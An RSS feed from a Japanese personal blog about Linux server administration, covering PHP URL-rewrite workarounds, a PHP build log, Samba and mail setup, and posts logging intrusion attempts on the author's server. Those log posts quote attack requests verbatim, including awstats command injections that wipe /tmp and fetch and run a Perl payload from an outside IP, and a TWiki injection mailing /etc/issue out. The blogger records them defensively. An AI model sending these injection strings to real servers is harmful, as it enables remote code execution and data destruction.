Jeans & Development / Linux https://www.rad51.net/jeans/ コンピューターのことなどを綴ったメモ (旧:目から鱗 w/SQLite) / リナックス及びサーバの管理 ja Jeans CMS © Weblog http://backend.userland.com/rss https://www.rad51.net/jeans/skins/jeans/images/jeans2.gif Jeans & Development https://www.rad51.net/jeans/ 1970年1月1日は、紀元後何日目? https://www.rad51.net/jeans/?itemid=211
FROM_DAYS(N)

指定された日数 N に対して DATE 型の値を返す。

この関数と、Unix timestamp の関連はどうなっているかというと、

SELECT FROM_DAYS(719528);

というクエリーが

1970-01-01

を返す。このことから、表題の質問の答えは、719528 日目ということになる。
 いいのかな?この結論で。一応検算しておこう。一年365日で、閏年では366日。100年に一度閏年が無くなるが、これは確か400年に一度キャンセルされる。したがって、紀元後1年から紀元後399年12月31日までは、閏年が 24*4+1=97 回。閏年で無い年が、400-97=303回。従って、この400年が何日に相当するかというと、

97*366+303*365=146097 (日)

だから、紀元後1年から、紀元後1599年12月31日までは、

146097*4=584388(日)

紀元後1600年から1899年12月31日までは、

(24*366+76*365)*3=109572(日)

1900年から1969年12月31日までは、閏年が17回有るので、

17*366+53*365=25567(日)

従って、紀元後1年1月1日から、1969年12月31日までは、

584388+109572+25567=719527(日)

で、次の日1970年1月1日は719528日目である。]]>
Linux https://www.rad51.net/jeans/?itemid=211 Thu, 13 Apr 2006 05:13:17 PDT ITEM211_20060413
Mod_Rewrite もどき2 https://www.rad51.net/jeans/?itemid=204
まず、.htaccess に以下のように記述。
<FilesMatch "^(item|catid|archive|archivelist)\-([0-9\-]+)\.html$">
  ErrorDocument 404 /nucleus/404.php
</FilesMatch>

さらに、以下の内容で 404.php を用意。
<?php
if (!isset($_SERVER['DOCUMENT_URI'])) {
    header("HTTP/1.0 404 Not Found");
    exit("404 Not Found");
}
$temp=preg_replace('/^[\S\s]*?\/([^\/]+)$/','$1',$_SERVER['DOCUMENT_URI']);
$_GET=array();
if (preg_match('/^archive\-([0-9]+)\-([0-9]+)\-([0-9]+)\.html$/',$temp,$matches)) {
    $_GET['archive']=$matches[2].'-'.$matches[3];
    $_GET['blogid']=$matches[1];
} else if (preg_match('/^item\-([0-9]+)\.html$/',$temp,$matches)) {
    $_GET['itemid']=$matches[1];
} else if (preg_match('/^catid\-([0-9]+)\.html$/',$temp,$matches)) {
    $_GET['catid']=$matches[1];
} else if (preg_match('/^archivelist\-([0-9]+)\.html$/',$temp,$matches)) {
    $_GET['archivelist']=$matches[1];
}
unset($temp);

$_SERVER['PATH_INFO']=$_SERVER['REQUEST_URI']=$_SERVER['DOCUMENT_URI'];
unset($_SERVER['DOCUMENT_ARGS']);
unset($_SERVER['DOCUMENT_URI']);
unset($_SERVER['DOCUMENT_PATH_INFO']);

include('./index.php');

?>

ただし、この方法が使える環境は、限られているようだ。ラクーカンでも、サーバの設定が変われば、使えなくなるかも(?)あと、GET は OK だが POST がまだできない。(追記:解決)]]>
Linux https://www.rad51.net/jeans/?itemid=204 Thu, 30 Mar 2006 05:48:04 PST ITEM204_20060330
Mod_Rewrite もどき https://www.rad51.net/jeans/?itemid=203  以前使っていたサーバでは、Mod_Rewrite を多用していただけにつらいところである。何か手はないかと探ってみたら、完全ではないものの、一つ解決方法を見つけた。『Redirect』『FilesMatch』なら使えるようなので、これを使用した。


まず、.htaccess に次のように記述
<FilesMatch "^(item|catid|archive|archivelist)\-([0-9\-]+)\.html$">
  Redirect /nucleus/ /nucleus/pseudo.php?
</FilesMatch>

さらに、以下のようなphp (ファイル名:pseudo.php)を用意した。
<?php
// This file will generate and return the main page of the site
$CONF = array();
$CONF['Self'] = 'index.php';

$_GET=array();
if ($i=strpos($_SERVER['REQUEST_URI'],'?/')) {
    $page=substr($_SERVER['REQUEST_URI'],$i+2);
    if (preg_match('/^archive\-([0-9]+)\-([0-9]+)\-([0-9]+)\.html$/',$page,$matches)) {
        $_GET['archive']=$matches[2].'-'.$matches[3];
        $_GET['blogid']=$matches[1];
    } else if (preg_match('/^item\-([0-9]+)\.html$/',$page,$matches)) {
        $_GET['itemid']=$matches[1];
    } else if (preg_match('/^catid\-([0-9]+)\.html$/',$page,$matches)) {
        $_GET['catid']=$matches[1];
    } else if (preg_match('/^archivelist\-([0-9]+)\.html$/',$page,$matches)) {
        $_GET['archivelist']=$matches[1];
    } else if (preg_match('/\?([^\?]+)$/',$page,$matches)) {
        foreach(explode('&',$matches[1]) as $value) if ($i=strpos($value,'=')) {
            $_GET[substr($value,0,$i)]=urldecode(substr($value,$i+1));
        }
    }
} else if (preg_match('/\?([^\?]+)$/',$page,$matches)) {
    foreach(explode('&',$matches[1]) as $value) if ($i=strpos($value,'=')) {
        $_GET[substr($value,0,$i)]=urldecode(substr($value,$i+1));
    }
}

include('./config.php');

selector();

?>

これで、mod_rewriteもどきのブログのできあがり。普通の mod_rerite と違う点は、たとえば 『/nucleus/item-143.html』 にアクセスすると、実際には『/nucleus/pseudo.php?/item-143.html』が表示されることである。サーバとブラウザの間で一度余分な通信が入るが、keep-alive で通信しているならば、速度の問題はほとんどなさそうである。]]>
Linux https://www.rad51.net/jeans/?itemid=203 Mon, 27 Mar 2006 11:08:12 PST ITEM203_20060327
PHPのアップグレード https://www.rad51.net/jeans/?itemid=100 PHPに“最悪”のセキュリティ・ホールとの情報に従って、以下の通り、PHPを4.4.1にアップグレードした。

# tar xvzf php-4.4.1.tar.gz
# cd php-4.4.1
# ./configure '--prefix=/usr' '--with-apxs2=/usr/bin/apxs2' \
'--with-config-file-path=/etc/php4/apache2' '--enable-memory-limit' '--disable-debug' \
'--with-regex=php' '--disable-rpath' '--disable-static' \
'--with-pic' '--with-layout=GNU' '--with-pear=/usr/share/php' \
'--enable-calendar' '--enable-sysvsem' '--enable-sysvshm' \
'--enable-sysvmsg' '--enable-track-vars' '--enable-trans-sid' \
'--enable-bcmath' '--with-bz2' '--enable-ctype' \
'--with-db4' '--with-iconv' '--enable-exif' \
'--enable-filepro' '--enable-ftp' '--with-gettext' \
'--enable-mbstring' '--with-pcre-regex=/usr' '--enable-shmop' \
'--enable-sockets' '--enable-wddx' '--disable-xml' \
'--with-expat-dir=/usr' '--with-xmlrpc' '--enable-yp' '--with-zlib' \
'--without-pgsql' '--with-kerberos=/usr' '--with-openssl=/usr' \
'--with-zip=/usr' '--enable-dbx' '--with-mime-magic=/usr/share/misc/file/magic.mime' \
'--with-exec-dir=/usr/lib/php4/libexec' '--without-mm' '--without-sybase-ct'

Sorry, I cannot run apxs. Possible reasons follow:

1. Perl is not installed
2. apxs was not found. Try to pass the path using --with-apxs2=/path/to/apxs
3. Apache was not built using --enable-so (the apxs usage page is displayed)

# apt-get install apache2-dev

The following NEW packages will be installed:
apache2-threaded-dev autoconf autotools-dev bzip2 libapr0-dev libdb4.2-dev
libexpat1-dev libldap2-dev libpcre3-dev libssl-dev libtool zlib1g-dev

# ./configure '--prefix=/usr'...(略)

checking for BZip2 in default path... not found
configure: error: Please reinstall the BZip2 distribution

# apt-get install libbz2-dev

The following NEW packages will be installed:
libbz2-dev

# ./configure '--prefix=/usr'...(略)

configure: error: Cannot find libzzip

# apt-get install libzzip-dev

The following NEW packages will be installed:
libzzip-dev

# ./configure '--prefix=/usr'...(略)

Generating files
updating cache ./config.cache
creating ./config.status
creating php4.spec
creating main/build-defs.h
creating scripts/phpize
creating scripts/man1/phpize.1
creating scripts/php-config
creating scripts/man1/php-config.1
creating sapi/cli/php.1
creating main/php_config.h
creating main/internal_functions.c
creating main/internal_functions_cli.c
+--------------------------------------------------------------------+
| License: |
| This software is subject to the PHP License, available in this |
| distribution in the file LICENSE. By continuing this installation |
| process, you are bound by the terms of this license agreement. |
| If you do not agree with the terms of this license, you must abort |
| the installation process at this point. |
+--------------------------------------------------------------------+
| *** NOTE *** |
| The default for register_globals is now OFF! |
| |
| If your application relies on register_globals being ON, you |
| should explicitly set it to on in your php.ini file. |
| Note that you are strongly encouraged to read |
| http://www.php.net/manual/en/security.globals.php |
| about the implications of having register_globals set to on, and |
| avoid using it if possible. |
+--------------------------------------------------------------------+

Thank you for using PHP.

# make

Build complete.
(It is safe to ignore warnings about tempnam and tmpnam).

# make install

./configure のオプションは、旧バージョンのPHPのphpinfo()からコピーして、"--without-mysql"を削除して用いた。

2006-02-28 追記
 GDが使えなかったので、追加した。

# ./configure '--prefix=/usr' (略) '--with-gd'

checking for GD support... yes
checking for the location of libjpeg... no
checking for the location of libpng... no
checking for the location of libXpm... no
checking for FreeType 1.x support... no
checking for FreeType 2... no
checking for T1lib support... no
checking whether to enable truetype string function in GD... no
checking whether to enable JIS-mapped Japanese font support in GD... no
checking for fabsf... yes
checking for floorf... yes
If configure fails try --with-jpeg-dir=<DIR>
configure: error: libpng.(a|so) not found.

# apt-get install libjpeg62 libjpeg62-dev libpng3 libpng3-dev
# ./configure '--prefix=/usr' (略) '--with-gd' '--with-jpeg-dir=/user/lib'

Thank you for using PHP.

# make clean
# make

Build complete.
(It is safe to ignore warnings about tempnam and tmpnam).

# /etc/init.d/apache2 stop
# make install
# /etc/init.d/apache2 start

『make clean』を行うのが、ポイントのようである。]]>
Linux https://www.rad51.net/jeans/?itemid=100 Tue, 01 Nov 2005 23:19:46 PST ITEM100_20051101
phpmyadminへの不正アクセス(10月) https://www.rad51.net/jeans/?itemid=94
アクセスは、209.181.254.5から。アメリカ・デンバーに本社のあるプロバイダの顧客だと思われる。接続は、以下の通り

"GET /phpmyadmin/main.php HTTP/1.1"
"GET /PMA/main.php HTTP/1.1"
"GET /mysql/main.php HTTP/1.1"
"GET /admin/main.php HTTP/1.1"
"GET /db/main.php HTTP/1.1"
"GET /dbadmin/main.php HTTP/1.1"
"GET /web/phpMyAdmin/main.php HTTP/1.1"
"GET /admin/pma/main.php HTTP/1.1"
"GET /admin/phpmyadmin/main.php HTTP/1.1"
"GET /admin/mysql/main.php HTTP/1.1"
"GET /phpmyadmin2/main.php HTTP/1.1"
"GET /mysqladmin/main.php HTTP/1.1"
"GET /mysql-admin/main.php HTTP/1.1"
"GET /main.php HTTP/1.1"
"GET /phpMyAdmin-2.5.6/main.php HTTP/1.1"
"GET /phpMyAdmin-2.5.4/main.php HTTP/1.1"
"GET /phpMyAdmin-2.5.1/main.php HTTP/1.1"
"GET /phpMyAdmin-2.2.3/main.php HTTP/1.1"
"GET /phpMyAdmin-2.2.6/main.php HTTP/1.1"
"GET /myadmin/main.php HTTP/1.1"
"GET /phpMyAdmin-2.6.0/main.php HTTP/1.1"
"GET /phpMyAdmin-2.6.0-pl1/main.php HTTP/1.1"
"GET /phpMyAdmin-2.6.3-pl1/main.php HTTP/1.1"
"GET /phpMyAdmin-2.6.3/main.php HTTP/1.1"
"GET /phpMyAdmin-2.6.3-rc1/main.php HTTP/1.1"
"GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.1"

 これを見ると、セキュリティホールのあるphpMyAdminのバージョンが一目瞭然である。調べてみると、比較的新しいバージョン(2.6.4-pl1)でさえ、セキュリティーホールが存在する(このセキュリティーホールについては、pl3で改善されたようである)。
 やはり、phpMyAdminをインストールする際は、アクセス制限をしかりかけておくことが基本であろう。このツールはその高機能さ故に、未知のセキュリティホールが含まれている可能性が非常に高い。]]>
Linux https://www.rad51.net/jeans/?itemid=94 Mon, 24 Oct 2005 21:23:50 PDT ITEM94_20051024
Sambaのインストール https://www.rad51.net/jeans/?itemid=85 このページを参考にした。

#apt-get install samba
The following NEW packages will be installed:
  libcupsys2-gnutls10 samba samba-common

(次の設定以外はすべてデフォルト)
How do you want to run Samba? inetd

# vi /etc/samba/smb.conf
(以下のように変更)
security = user
[homes]
   comment = Home Directories
   browseable = no
   readonly = no
   writable = yes
   create mask = 0755
   directory mask = 0755

# smbpasswd</etc/passwd>/etc/samba/smbpasswd
New SMB password:
Retype new SMB password:

# chmod 600 /etc/samba/smbpasswd

# smbpasswd katsumi
New SMB password:
Retype new SMB password:

# /etc/init.d/samba restart


iptablesの設定で、つなげたいコンピューターのみがポート137, 138, 139, 445にアクセスできるようにしておいた。]]>
Linux https://www.rad51.net/jeans/?itemid=85 Mon, 26 Sep 2005 21:25:51 PDT ITEM85_20050926
SMTP 設定 https://www.rad51.net/jeans/?itemid=76  PHPのmail()関数を使ってみたが、メールがいっこうに送信されない。どうやらなにかの設定が悪いようである。

 思い出されるのは、Debian-Linuxのインストールの際に、質問に答える形で行ったSMTP設定である。何をどう設定したのか思い出せないが、SMTPは使わないつもりだったので、使用できないような設定にしたことだけは覚えている。

 色々な設定を試してみたが、駄目。やはり、あの、『思い出せない』設定でSMTPを使えるようにしないといけないらしい。

 googleで色々調べてみると、こんなページを見つけた。そうそう、これこれ、この設定だ。exim4と呼ばれるサービスを再設定すればよいらしい。

# dpkg-reconfigure exim4-config

Split configuration into small files? <No>

General type of mail configuration: internet site; mail is sent and received directly using SMTP

System mail name: fkmac01.phc.chalmers.se

IP-addresses to listen on for incoming SMTP connections: 127.0.0.1

Other destinations for which mail is accepted:

Domains to relay mail for:

Machines to relay mail for:

Keep number of DNS-queries minimal (Dial-on-Demand)?  <No>


これでうまく働きだした。では、妻からの要望に応えて、メール投稿フォームを作るか…。]]>
Linux https://www.rad51.net/jeans/?itemid=76 Thu, 15 Sep 2005 19:33:43 PDT ITEM76_20050915
awstats関連の不正アクセス(9月) https://www.rad51.net/jeans/?itemid=75

82.90.174.226 [ripe.net] [arin.net] [lacnic.net]
host226-174.pool8290.interbusiness.it
- - [05/Sep/2005:00:53:14 +0200]
"GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


200.41.4.4 [ripe.net] [arin.net] [lacnic.net]
c414-4.impsat.com.co
- - [07/Sep/2005:12:05:42 +0200]
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"



194.141.32.77 [ripe.net] [arin.net] [lacnic.net]
opit.unwe.acad.bg
- - [18/Sep/2005:03:50:27 +0200]
"GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


62.149.230.53 [ripe.net] [arin.net] [lacnic.net]
host53-230-149-62.serverdedicati.aruba.it
- - [21/Sep/2005:21:08:21 +0200]
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


]]>
Linux https://www.rad51.net/jeans/?itemid=75 Thu, 15 Sep 2005 00:53:00 PDT ITEM75_20050915
phpmyadmin への不正アクセス一覧(9月) https://www.rad51.net/jeans/?itemid=74
/phpmyadmin/main.php
/PMA/main.php
/mysql/main.php
/admin/main.php
/db/main.php
/dbadmin/main.php
/admin/pma/main.php
/web/phpMyAdmin/main.php
/admin/phpmyadmin/main.php
/admin/mysql/main.php
/phpmyadmin2/main.php
/mysql-admin/main.php
/mysqladmin/main.php
/mysql-admin/main.php
/main.php
/phpMyAdmin-X.X.X/main.php (X.X.Xはバージョン番号)
/myadmin/main.php


170.94.47.8 [ripe.net] [arin.net] [lacnic.net]
- - [04/Sep/2005:11:30:47 +0200]
"GET /phpmyadmin/index.php HTTP/1.0" 404 289 "-" "-"


195.56.182.136 [ripe.net] [arin.net] [lacnic.net]
- - [06/Sep/2005:15:53:10 +0200]
"GET /phpmyadmin/deadhat.php HTTP/1.0" 301 57 "-" "-"


67.69.142.66 [ripe.net] [arin.net] [lacnic.net]
- - [06/Sep/2005:18:54:02 +0200]
"GET /phpmyadmin/main.php HTTP/1.1" 301 57 "-" "PMAFind"


213.61.245.254 [ripe.net] [arin.net] [lacnic.net]
h-213.61.245.254.host.de.colt.net
- - [06/Sep/2005:23:28:47 +0200]
"GET /phpmyadmin/main.php HTTP/1.0" 301 57 "-" "-"


141.20.116.9 [ripe.net] [arin.net] [lacnic.net]
- - [10/Sep/2005:21:16:29 +0200]
"GET /phpmyadmin/index.php HTTP/1.0" 301 57 "-" "-"


165.21.82.242 [ripe.net] [arin.net] [lacnic.net]
- - [11/Sep/2005:00:19:46 +0200]
"GET /phpmyadmin/index.php HTTP/1.0" 301 57 "-" "-"



209.178.222.236 [ripe.net] [arin.net] [lacnic.net]
- - [13/Sep/2005:18:07:10 +0200]
"GET /phpmyadmin/index.php HTTP/1.0" 301 57 "-" "-"


139.124.196.5 [ripe.net] [arin.net] [lacnic.net]
srv-web-dev.pharoweb.univ-mrs.fr
- - [14/Sep/2005:02:54:55 +0200]
"GET /phpmyadmin/index.php HTTP/1.0" 301 57 "-" "-"


66.235.201.110 [ripe.net] [arin.net] [lacnic.net]
ds201-110.ipowerweb.com
- - [14/Sep/2005:18:23:22 +0200]
"GET /phpmyadmin/index.php HTTP/1.0" 301 57 "-" "-"


194.249.192.88 [ripe.net] [arin.net] [lacnic.net]
- - [16/Sep/2005:15:57:08 +0200]
"GET /phpmyadmin/main.php HTTP/1.0" 301 57 "-" "pmafind"


212.34.174.174 [ripe.net] [arin.net] [lacnic.net]
- - [17/Sep/2005:00:48:53 +0200]
"GET /phpmyadmin/index.php HTTP/1.0" 301 57 "-" "-"


83.65.26.183 [ripe.net] [arin.net] [lacnic.net]
83-65-26-183.static.xdsl-line.inode.at
- - [19/Sep/2005:01:05:14 +0200]
"GET /phpmyadmin/main.php HTTP/1.1" 301 57 "-" "-"


195.228.231.61 [ripe.net] [arin.net] [lacnic.net]
- - [19/Sep/2005:01:09:13 +0200]
"GET /phpmyadmin/index.php HTTP/1.0" 301 57 "-" "-"


194.150.85.114 [ripe.net] [arin.net] [lacnic.net]
- - [22/Sep/2005:13:12:52 +0200]
"GET /phpmyadmin/main.php HTTP/1.0" 301 57 "-" "pmafind"


61.72.249.253 [ripe.net] [arin.net] [lacnic.net]
- - [24/Sep/2005:14:46:17 +0200]
"GET /phpmyadmin/index.php HTTP/1.0" 301 57 "-" "-"


195.146.36.201 [ripe.net] [arin.net] [lacnic.net]
- - [25/Sep/2005:16:15:08 +0200]
"GET /phpmyadmin/index.php HTTP/1.1" 301 57 "-" "-"


]]>
Linux https://www.rad51.net/jeans/?itemid=74 Wed, 14 Sep 2005 22:35:06 PDT ITEM74_20050914
不正アクセス一覧(2005-09) https://www.rad51.net/jeans/?itemid=71
<?php
header("HTTP/1.0 301 Moved Permanently");
header('Location: http://'.$_SERVER['REMOTE_ADDR'].$_SERVER['REQUEST_URI']);
?><html><body>HTTP/1.0 301 Moved Permanently</body></html>


207.14.166.253
"GET /phpmyadmin/main.php HTTP/1.0" 404 279 "-" "pmafind"
"GET /PMA/main.php HTTP/1.0" 404 272 "-" "pmafind"
"GET /mysql/main.php HTTP/1.0" 404 274 "-" "pmafind"
"GET /admin/main.php HTTP/1.0" 404 274 "-" "pmafind"
"GET /db/main.php HTTP/1.0" 404 271 "-" "pmafind"
"GET /dbadmin/main.php HTTP/1.0" 404 276 "-" "pmafind"
"GET /web/phpMyAdmin/main.php HTTP/1.0" 404 283 "-" "pmafind"
"GET /admin/pma/main.php HTTP/1.0" 404 278 "-" "pmafind"
"GET /admin/phpmyadmin/main.php HTTP/1.0" 404 285 "-" "pmafind"
"GET /admin/mysql/main.php HTTP/1.0" 404 280 "-" "pmafind"
"GET /mysql-admin/main.php HTTP/1.0" 404 280 "-" "pmafind"
"GET /phpmyadmin2/main.php HTTP/1.0" 404 280 "-" "pmafind"
"GET /mysqladmin/main.php HTTP/1.0" 404 279 "-" "pmafind"
"GET /mysql-admin/main.php HTTP/1.0" 404 280 "-" "pmafind"
"GET /main.php HTTP/1.0" 404 268 "-" "pmafind"
"GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 404 285 "-" "pmafind"
"GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 285 "-" "pmafind"
"GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 404 285 "-" "pmafind"

210.111.138.120, 216.94.41.105
"GET /oscommerce/admin/file_manager.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /osc/admin/file_manager.php HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /osCommerce/catalog/admin/file_manager.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /catalog/admin/file_manager.php HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /admin/file_manager.php HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /store/admin/file_manager.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /onlineshop/admin/file_manager.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /shop/admin/file_manager.php HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

69.84.133.37 170.94.47.8 141.20.116.9 165.21.82.242 209.178.222.236 139.124.196.5 66.235.201.110
"GET /phpmyadmin/index.php HTTP/1.0" 404 289 "-" "-"

195.56.182.136
"GET /phpmyadmin/deadhat.php HTTP/1.0"

67.69.142.66
"GET /phpmyadmin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /PMA/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /mysql/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /admin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /db/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /dbadmin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /web/phpMyAdmin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /admin/pma/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /admin/phpmyadmin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /admin/mysql/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /mysql-admin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /phpmyadmin2/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /mysqladmin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /mysql-admin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /phpMyAdmin-2.5.6/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /phpMyAdmin-2.5.4/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /phpMyAdmin-2.5.1/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /phpMyAdmin-2.2.3/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /phpMyAdmin-2.2.6/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /myadmin/main.php HTTP/1.1" 404 276 "-" "PMAFind"

213.61.245.254
"GET /phpmyadmin/main.php HTTP/1.0" 301 57 "-" "-"

82.90.174.226
"GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 271 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 274 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 281 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

200.41.4.4
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //cgi-bin/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //cgi/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //awstats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //stats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //cgi/stats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

202.51.167.165
"GET http://222.240.146.34:804/proxy.cgi HTTP/1.1" 404 272 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)"

209.145.65.165
"GET /cgi-bin/view/Main/TWikiUsers?rev=2%20%7Ccat%20/etc/issue%20|%20mail%20-s%20c%20test1@7cities.net%00 HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /twiki/bin/view/Main/TWikiUsers?rev=2%20%7Ccat%20/etc/issue%20|%20mail%20-s%20t%20test1@7cities.net%00 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
]]>
Linux https://www.rad51.net/jeans/?itemid=71 Mon, 05 Sep 2005 00:09:35 PDT ITEM71_20050905